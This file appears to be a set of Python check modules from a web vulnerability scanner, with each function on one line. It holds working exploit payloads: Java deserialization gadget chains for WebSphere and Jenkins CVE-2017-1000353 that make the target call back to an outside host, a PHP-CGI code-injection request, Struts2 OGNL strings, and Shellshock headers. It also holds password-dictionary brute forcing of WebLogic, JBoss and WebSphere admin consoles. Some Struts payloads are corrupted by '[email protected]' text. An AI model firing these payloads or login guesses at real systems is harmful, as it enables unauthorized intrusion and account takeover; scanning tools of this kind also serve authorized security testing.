def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) host = ip + ':' + str(port) print('testing if websphere java unserialized vul') http = httpparse() try: socket.setdefaulttimeout(3) post_header = { "Content-Type": "text/xml; charset=utf-8", "SOAPAction": "\"urn:AdminService\"" } post_data = (b"""<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <SOAP-ENV:Header xmlns:ns0="admin" ns0:WASRemoteRuntimeVersion="8.5.5.1" ns0:JMXMessageVersion="1.2.0" ns0:SecurityEnabled="true" ns0:JMXVersion="1.2.0"> <LoginMethod>BasicAuth</LoginMethod> </SOAP-ENV:Header> <SOAP-ENV:Body> <ns1:getAttribute xmlns:ns1="urn:AdminService" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <objectname xsi:type="ns1:javax.management.ObjectName">%s</objectname> <attribute xsi:type="xsd:string">ringBufferSize</attribute> </ns1:getAttribute> </SOAP-ENV:Body> </SOAP-ENV:Envelope> """) dnsserver = get_ver_ip(ip) random_num = random_str(6 + 15 - len(dnsserver)) payload = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b78707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00154c0004686f737471007e00154c000870726f746f636f6c71007e00154c000372656671007e001578707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00155b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001d000000017671007e001d7371007e00177571007e001b00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001d000000017671007e001b7371007e00177571007e001b0000000074000a6f70656e53747265616d7571007e001d000000007371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e0037" b = 'http://' + dnsserver + ':8088/add/' + random_num b = bytes(b, 'utf-8') payload = h2bin(payload) payload = payload.replace(b'http://255.255.255.255:8088/add/random', b) #payload = codecs.decode(payload, 'hex').replace('http://255.255.255.255:8088/add/random', ('http://%s:8088/add/%s' % (dnsserver, random_num)).encode()) post_data = post_data % base64.b64encode(payload) if protocol == 'https': req = requests.post(url=url + '/', data=post_data, headers=post_header, verify=False, timeout=5) else: req = requests.post(url=url + '/', data=post_data, headers=post_header, timeout=5) time.sleep(5) req = requests.get("http://%s:8088/check/%s" % (dnsserver, random_num), verify=False, timeout=5) if 'YES' in req.text: msg = 'There is Websphere-Java_Unserialized on url :' + url + ' .' number = 'v56' return True, url, number, msg else: msg = 'There is no Websphere-Java_Unserialized' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol,ip,port): url = protocol+'://'+ip+':'+str(port) print('testing if weblogic-Console') http = httpparse() passdictarr = getpassdict() psw = passdictarr.get_pass_dict() try: tm = http.httpreq('GET', protocol, ip, port, '/console/login/LoginForm.jsp') if b'j_password' in tm[2] and tm[0] == 200: for pass_ in psw: data = 'j_username=weblogic&j_password='******'&j_character_encoding=UTF-8' data = data.encode(encoding="utf-8") target_url = url + '/console/j_security_check' tm = http.httpreq('POST', protocol, ip, port, '/console/j_security_check',data=data) if re.search(b'console</a>', tm[2],re.I): msg = 'Find'+ 'WebLogic-Console! with pass ' +pass_+ ' in url:' +protocol+'://'+ip+':'+str(port)+'/' print(msg) number = 'v12' return True,url,number,msg else: pass else: msg = 'not WebLogic-Console' number = 'v0' return False,url,number,msg except Exception as e: msg = str(e) number = 'v0' return False,url,number,msg msg = 'There is no WebLogic-Console weak pass vul' number = 'v0' return False,url,number,msg
def protocolset(ip, port): http = httpparse() ip = protocoparse.judegIp(ip) path = '' port = str(port) try: tm = http.httptest('http', '%s' % ip, port, path) if tm and (tm != None) and (tm[0] != 504) and (tm[0] != 400) and ( tm[0] != 502) and (str(tm[2]) != []): protocol = 'http' rip = ip port = str(port) return protocol, rip, port else: tms = http.httptest('https', '%s' % ip, port, path) if tms and (tms != None) and (tms[0] != 504) and (tms[0] != 502): protocol = 'https' rip = ip port = str(port) return protocol, rip, port else: if tm and (tm != None) and tm[0] == 400: protocol = 'http' rip = ip port = str(port) return protocol, rip, port else: protocol = '' rip = ip port = str(port) return protocol, rip, port except Exception as e: print(e)
def verify(protocol,ip,port): oldurl = protocol+'://'+ip+':'+str(port) print('testing if php cgi remote code exec vul') url_list = test_url(protocol,ip,port,timeout=5) payload = '?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E' evalcode = '''<?php echo 'Content-type: text/html\n\n';echo 'Here_is_apache_php_remote_code_exec';exit(1);?>''' fake_header = { 'User-Agent': 'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25'} data = 1 try: for url in url_list: if 'cgi' in url: try: http = httpparse() tm = http.httpreq('POST', protocol, ip, port, url+payload,data=evalcode,header=fake_header) res_html = str(tm[2]) except Exception as e: msg = str(e) print(msg) pass if 'Here_is_apache_php_remote_code_exec' in res_html: msg = 'There is php cgi rce vul on ' + oldurl+url+payload + ' .' number = 'v91' return True, url, number, msg except Exception as e: msg = str(e) pass msg = 'There is no php cgi rce vul' number = 'v0' return False,oldurl,number,msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if v2 arbitrary file download vul') http = httpparse() try: path = '/Conf/jsp/common/downloadAction.do?path=../management/webapps/root/index.jsp' tm = http.httpreq('GET', protocol, ip, port, path) if tm and (tm != None) and tm[0] == 200 and ('index.jsp' in str( tm[2])): try: path = '/Confspursah/jsp/common/downloadAction.do' tmn = http.httpreq('GET', protocol, ip, port, path) if tmn and (tmn != None) and tmn[0] == 404: msg = 'There is v2 arbitrary file download vul on url: ' + url + ' .' number = 'v27' print(msg) return True, url, number, msg else: msg = 'There is no v2 arbitrary file download vul on ' + url + ' .' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg else: msg = 'There is no v2 arbitrary file download vul' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol,ip,port): url = protocol+'://'+ip+':'+str(port) print('testing if ecology vul') http = httpparse() try: tm = http.httpreq('GET', protocol, ip, port, '/main.jsp') if tm[0] ==302 and re.search(b'login/Login.jsp',tm[2],re.I): msg = 'e-cology vul' number = 'v20' print(msg) return True,url,number,msg elif http.httpreq('GET', protocol, ip, port, '/weaver/weaver.email.FileDownloadLocation2')[0] == 500: if http.httpreq('GET', protocol, ip, port, '/weaver/weaver.email.FileDownloadLocation')[0] == 200: msg = 'may have e-cology sql vul' number = 'v20' print(msg) return True,url,number,msg else: pass else: pass except Exception as e: msg = str(e) number = 'v0' return False,url,number,msg msg = 'There is no e-cology' number = 'v0' return False,url,number,msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if JBOSS-WebConsole') http = httpparse() passdictarr = getpassdict() error_i = 0 psw = passdictarr.get_pass_dict() try: tm = http.httpreq('GET', protocol, ip, port, '/web-console/') if re.search('jboss', str(tm[1]), re.I): if tm[0] == 200: msg = 'Found JBOSS-WebConsole! in url:' + url + '/web-console/ with no password' number = 'v7' print(msg) return True, url, number, msg else: for pass_ in psw: try: login_url = url + '/web-console/' request = urllib.request.Request(login_url) auth_str_temp = 'admin' + ':' + pass_ auth_str = base64.b64encode( auth_str_temp.encode(encoding='utf-8')) request.add_header('Authorization', 'Basic ' + auth_str.decode()) res = urllib.request.urlopen(request, timeout=5) res_code = res.code except urllib.error.HTTPError as e: res_code = e.code except urllib.error.URLError as e: error_i += 1 if error_i >= 3: msg = 'Therer is no JBOSS-WEBConsole weakpass vul in url:' + login_url + '.' number = 'v0' return False, url, number, msg continue if int(res_code) == 404 or int(res_code) == 502: msg = 'Therer is no JBOSS-WEBConsole vul in url:' + login_url + '.' number = 'v0' return False, url, number, msg if int(res_code) == 401 or int(res_code) == 403: continue if int(res_code) == 200: msg = 'Found JBOSS-WEBConsole in url:' + url + '/web-console/HtmlAdaptor with password: '******'.' print(msg) number = 'v6' return True, url, number, msg else: pass msg = 'The url:' + url + 'is not jboss' number = 'v0' return False, url, number, msg except Exception as e: print(e) msg = str(e) number = 'v0' return False, url, number, msg msg = 'There is no JBOSS-WEBConsole weakpass vul on url' number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if iis shortname vul') http = httpparse() try: path = '/*~1****/a.aspx' tm = http.httpreq('GET', protocol, ip, port, path) print(tm[0]) if tm and (tm != None) and tm[0] == 404: try: path = '/spurs*~1****/a.aspx' tmn = http.httpreq('GET', protocol, ip, port, path) print(tmn[0]) if tmn and (tmn != None) and tmn[0] == 400: msg = 'There is iis shortname vul on url: ' + url + ' .' number = 'v15' print(msg) return True, url, number, msg else: msg = 'There is no iis shortname vul on ' + url + ' .' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg else: msg = 'There is no iis shortname vul on ' + url + ' .' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): path = '/ibm/console/logon.jsp' url = protocol + '://' + ip + ':' + str(port) + path print('testing if websphere Console') http = httpparse() passdictarr = getpassdict() ps = passdictarr.get_pass_dict() ps.append('websphere') try: tm = http.httpreq('GET', protocol, ip, port, path) if re.search('WebSphere', str(tm[2]), re.I): for psw in ps: data = 'j_username=admin&j_password='******'&action=%E7%99%BB%E5%BD%95' npath = '/ibm/console/j_security_check' try: data = data.encode('utf-8') tm = http.httpreq('POST', protocol, ip, port, path=npath, data=data) for item in tm[1]: if item[0] == 'Content-Type': res = item[1] if 'logonError' in res: pass else: nspath = protocol + '://' + ip + ':' + str( port) + '/ibm/console/' if nspath == res: msg = 'Find' + 'Websphere-Console! with pass ' + psw + ' in url:' + protocol + '://' + ip + ':' + str( port) + npath print(msg) number = 'v13' return True, url, number, msg else: pass else: pass else: pass except Exception as e: pass else: msg = 'cannot log on websphere console' number = 'v0' return False, url, number, msg else: msg = 'it is not websphere console' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if jenkins cve-2017-1000353 vul') try: session = str(uuid.uuid4()) socket.setdefaulttimeout(5) dnsserver = get_ver_ip(ip) ramdmum = random_str(6 + 15 - len(dnsserver)) URL = str(url + '/cli') t = threading.Thread(target=download, args=(URL, session)) t.start() time.sleep(1) http = httpparse() headers = { 'Content-type': 'application/octet-stream', 'Accept-Encoding': 'None', 'Transfer-Encoding': 'chunked', 'Session': session, 'Cache-Control': 'no-cache', 'Content-type': 'application/octet-stream', 'Side': 'upload' } payload = '0d0a37370d0a3c3d3d3d5b4a454e4b494e532052454d4f54494e472043415041434954595d3d3d3d3e724f304142584e794142706f6457527a62323475636d567462335270626d63755132467759574a7062476c3065514141414141414141414241674142536741456257467a6133687741414141414141414148343d0d0a340d0a000000000d0a3961650d0aaced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e63757272656e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e577269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537472696e673b7870757200025b42acf317f8060854e002000078700000054caced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e000378707672000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00124c0004686f737471007e00124c000870726f746f636f6c71007e00124c000372656671007e001278707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d6571007e00125b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000787000000001757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb342020000787074000e676574436f6e7374727563746f727571007e001a000000017671007e001a7371007e00147571007e001800000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000001740026687474703a2f2f3235352e3235352e3235352e3235353a383038382f6164642f72616e646f6d74000b6e6577496e7374616e63657571007e001a000000017671007e00187371007e00147571007e00180000000074000a6f70656e53747265616d7571007e001a000000007371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878787571007e00110000002e302c02140a665ea0697942e464f2eb42fc2ee4cffe6bda1002142690cdb27f41817c332fdea1526b801b779d321f740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000017704000000017400076a656e6b696e7378787371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e002070780d0a300d0a0d0a' a = 'http://255.255.255.255:8088/add/random' a = str2hex(a) b = 'http://%s:8088/add/%s' % (dnsserver, ramdmum) b = str2hex(b) payload = payload.replace(a, b) payload = h2bin(payload) #payload = payload.replace('http://255.255.255.255:8088/add/random', 'http://' + dnsserver +':8088/add/' + ramdmum) #req = urllib.request.Request(url=URL, headers=headers, data=payload) #page = urllib.request.urlopen(req,timeout=3).read() #urllib.request.urlopen(urllib.request.Request(URL, headers=headers, data=payload)) time.sleep(3) #req = urllib.request.Request("http://%s:8088/check/%s" % (dnsserver, ramdmum)); #reqopen = urllib.request.urlopen(req) check_result = requests.get(url="http://%s:8088/check/%s" % (dnsserver, ramdmum), timeout=3) if "YES" in check_result.text: msg = 'There is jenkisn cve-2017-1000353 vul on ' + url + ' .' print(msg) number = 'v43' return True, url, number, msg else: pass except Exception as e: msg = str(e) print(msg) number = 'v0' return False, url, number, msg msg = 'There is no jenkins cve-2017-1000353 vul' number = 'v0' return False, url, number, msg
def test_url(protocol,domain, port,timeout): url_list = [] http = httpparse() vul_url = ['/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi'] for url in vul_url: try: tm = http.httpreq('GET', protocol, domain, port, url) if tm[0] == 200: url_list.append(url) else: pass except Exception as e: msg = str(e) pass return list(set(url_list))
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if jenkins unauth vul') http = httpparse() try: path = '' tm = http.httpreq('GET', protocol, ip, port, path) if tm and (tm != None) and tm[0] == 200 and b'/asynchPeople/' in tm[2]: path = path + '/script' print(path) newtm = http.httpreq('GET', protocol, ip, port, path) if newtm and (newtm != None) and newtm[0] == 200 and b'println' in newtm[ 2] and b'submit' in newtm[2]: msg = 'There is a jenkins unauth vul which can result in get shell on %s' % url print(msg) number = 'v36' return True, url, number, msg else: pass else: pass url = protocol + '://' + ip + ':' + str(port) path = '/jenkins/' tm1 = http.httpreq('GET', protocol, ip, port, path) if tm1 and (tm1 != None ) and tm1[0] == 200 and b'Dashboard [Jenkins]' in tm1[2]: path = path + '/script' newtm1 = http.httpreq('GET', protocol, ip, port, path) if newtm1 and (newtm1 != None) and newtm1[0] == 200 and b'println' in newtm1[ 2] and b'submit' in newtm1[2]: msg = 'There is a jenkins unauth vul which can result in get shell on %s' % url print(msg) number = 'v36' return True, url, number, msg else: pass else: pass except Exception as e: print(str(e)) msg = str(e) number = 'v0' return False, url, number, msg msg = 'There is no jenkins unauth vul' number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if hudson unauth vul') http = httpparse() try: path = '' tm = http.httpreq('GET', protocol, ip, port, path) if tm and (tm != None) and tm[0] == 200 and b'Dashboard [Hudson]' in tm[2]: path = path + '/script' newtm = http.httpreq('GET', protocol, ip, port, path) if newtm and (newtm != None) and newtm[0] == 200 and b'println' in newtm[ 2] and b'submit' in newtm[2]: msg = 'There is a hudson unauth vul which can result in get shell on %s' % url print(msg) number = 'v35' return True, url, number, msg else: pass else: pass url = protocol + '://' + ip + ':' + str(port) path = '/hudson/' tm1 = http.httpreq('GET', protocol, ip, port, path) if tm1 and (tm1 != None ) and tm1[0] == 200 and b'Dashboard [Hudson]' in tm1[2]: path = path + '/script' newtm1 = http.httpreq('GET', protocol, ip, port, path) if newtm1 and (newtm1 != None) and newtm1[0] == 200 and b'println' in newtm1[ 2] and b'submit' in newtm1[2]: msg = 'There is a hudson unauth vul which can result in get shell on %s' % url print(msg) number = 'v35' return True, url, number, msg else: msg = 'There is no hudson unauth vul on %s' % url number = 'v0' return False, url, number, msg else: msg = 'There is no hunson unauth vul on %s' % url number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol,ip,port): payloads = {"S2-005":"('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\[email protected]@EMPTY_SET')(c))&(g)(('\\43req\\[email protected]@getRequest()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i2)(('\\43xman\\[email protected]@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(1111*2222)')(d))&(i99)(('\\43xman.getWriter().close()')(d))", "S2-009A":"class.classLoader.jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class.classLoader.jarPath)('meh')]", "S2-009B":"class['classLoader'].jarPath=(#context['xwork.MethodAccessor.denyMethodExecution']= new java.lang.Boolean(false), #_memberAccess['allowStaticMethodAccess']=true,#[email protected]@getRequest(),#[email protected]@getResponse().getWriter(),#outstr.println(1111*2222),#outstr.close())(meh)&z[(class['classLoader'].jarPath)('meh')]", "S2-013":"a=1${(%23_memberAccess['allowStaticMethodAccess']=true,%[email protected]@getRequest(),%[email protected]@getResponse().getWriter(),%23k8out.println(1111*2222),%23k8out.close())}", "S2-016A":"redirect:${1111*2222}", "S2-016B":"redirectAction:${1111*2222}", "S2-016C":"action:${1111*2222}", "S2-019A":"debug=command&expression=1111*2222", "S2-019B":"debug=command&expression=%23_memberAccess['allowStaticMethodAccess']=true,@java.lang.Runtime@getRuntime()", "S2-020":"Class.ClassLoader.parent=GENXOR", "S2-021":"Class['ClassLoader'].resources=GENXOR", "S2-022A":"Class.ClassLoader.parent=GENXOR", "S2-022B":"Class['ClassLoader'].resources=GENXOR", } success = [] payload = {} url = protocol+'://'+ip+':'+str(port) for id in payloads: if not re.search(list(filter(str.isdigit,id)),str(success)): http = httpparse() tm = http.httpreq("POST",protocol,ip,str(port),data=payloads[id]) if re.search('S2-016', id): if re.search('2468642', str(tm[1][1])): success.append(list(filter(str.isdigit,id))) payload[id] = tm[0] elif id == "S2-020" or id == "S2-021": if tm[1][0] == 404 and http.httpreq('POST',protocol,ip,str(port), data='')[1][0] != 404: success.append(list(filter(str.isdigit,id))) payload[id] = tm[0] elif re.search('S2-022', id): if http.httpreq('GET', protocol,ip,port, header={"Cookie":payloads[id]})[1][0] == 404 and http.httpreq('get',protocol,ip,port)[1][0] != 404: success.append(list(filter(str.isdigit,id))) payload[id] = tm[0] else: if re.search('2468642|java\.lang\.Runtime@', tm[1][2], re.I): success.append(list(filter(str.isdigit,id))) payload[id] = tm[0] for k in list(payload.keys()): if payload[k] != 404: msg = 'There is a struts2 vul , payloadid is'+k+'.' print(msg) return True,url,msg else: pass else: msg = 'There is no struts2 vul' return True,url,msg
def protocolurlset(ip, port): urls = [ 'websphereconsole|/ibm/console/logon.jsp', 'weblogicconsole|/console/login/LoginForm.jsp', 'jbossadmin|/admin-console/index.seam', 'jbossconsole|/jmx-console/', 'jbosspass|/web-console/', 'jboss|/invoker/JMXInvokerServlet' ] http = httpparse() ip = protocoparse.judegIp(ip) port = int(port) try: for url in urls: path = url.split('|')[1] module = url.split('|')[0] tm = http.httptest('https', '%s' % ip, port, path) if tm and (tm != None) and (tm[0] != 404) and ( tm[0] != 504) and (tm[0] != 502): protocol = 'https' rip = ip port = str(port) npath = path nmodule = module return protocol, rip, port, npath, nmodule else: domain = 'http://' + ip + ':' + str(port) tm = http.httptest('http', '%s' % ip, port, path) if tm and (tm != None) and (tm[0] != 404) and ( tm[0] != 400) and (tm[0] != 504) and (str(tm[2]) != []): protocol = 'http' rip = ip port = str(port) npath = path nmodule = module return protocol, rip, port, npath, nmodule else: pass else: protocol = '' rip = ip port = str(port) npath = '' nmodule = '' return protocol, rip, port, npath, nmodule except Exception as e: print(e)
def verify(protocol, ip, port): oldurl = protocol + '://' + ip + ':' + str(port) print('testing if shell shock vul') url_list = test_url(protocol, ip, port, timeout=10) try: flag_list = [ '() { :; }; echo; echo X-Bash-Test: hczjhdqtjh', 'env x="() { :;}; echo hczjhdqtjh" bash -c "echo this is a test"', '() { :;};a="hczjhdqtjh";echo "a: $a"' ] for url in url_list: if 'cgi' in url: for flag in flag_list: header = { 'cookie': flag, 'User-Agent': flag, 'Referrer': flag } try: http = httpparse() tm = http.httpreq('GET', protocol, ip, port, url, header=header) res_html = str(tm[2]) res_header = str(tm[1]) except Exception as e: msg = str(e) print(msg) pass if "hczjhdqtjh" in res_header: msg = 'There is shell shock vul on ' + oldurl + url + ' .' number = 'v45' return True, url, number, msg except Exception as e: msg = str(e) print(msg) pass msg = 'There is no shell shock vul' number = 'v0' return False, oldurl, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) print('testing if CVE-2017-12149 JBOSS AS 6.x unserialized vul') http = httpparse() tag = 'JBoss Web' try: tm = http.httpreq('GET', protocol, ip, port, '/invoker/readonly') if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 500: msg = 'There is CVE-2017-12149 JBOSS AS 6.x unserialized vul on url: ' + url + ' .' number = 'v62' return True, url, number, msg else: pass except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg msg = 'There is no CVE-2017-12149 JBOSS AS 6.x unserialized vul' number = 'v0' return False, url, number, msg
def verify(protocol, ip, port): url = protocol + '://' + ip + ':' + str(port) http = httpparse() print('testing if e-Mobile backstage') try: #header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"} tm = http.httpreq('GET', protocol, ip, port, '/login.do') if tm[0] == 200 and re.search(b'e-Mobile', tm[2], re.I): msg = 'e-Mobile backstage is:' + url + '/login.do' number = 'v21' print(msg) return True, url, number, msg else: msg = 'Ther is no e-Mobile backstage' number = 'v0' return False, url, number, msg except Exception as e: msg = str(e) number = 'v0' return False, url, number, msg
def verify(protocol,ip,port): url = protocol+'://'+ip+':'+str(port) print('testing if CVE-2017-7504 JBOSSMQ JMS colony unserialized vul') http = httpparse() tag = 'This is the JBossMQ HTTP-IL' try: tm = http.httpreq('GET', protocol, ip, port, '/jbossmq-httpil/HTTPServerILServlet') if (re.search(tag,str(tm[2]),re.I)) and tm[0] == 200 and (re.search('JBoss',str(tm[1]),re.I)): msg = 'There is CVE-2017-7504 JBOSSMQ JMS colony unserialized vul on url: ' +url+ ' .' number = 'v61' return True,url,number,msg else: pass except Exception as e: msg = str(e) number = 'v0' return False,url,number,msg msg = 'There is no CVE-2017-7504 JBOSSMQ JMS colony unserialized vul' number = 'v0' return False,url,number,msg
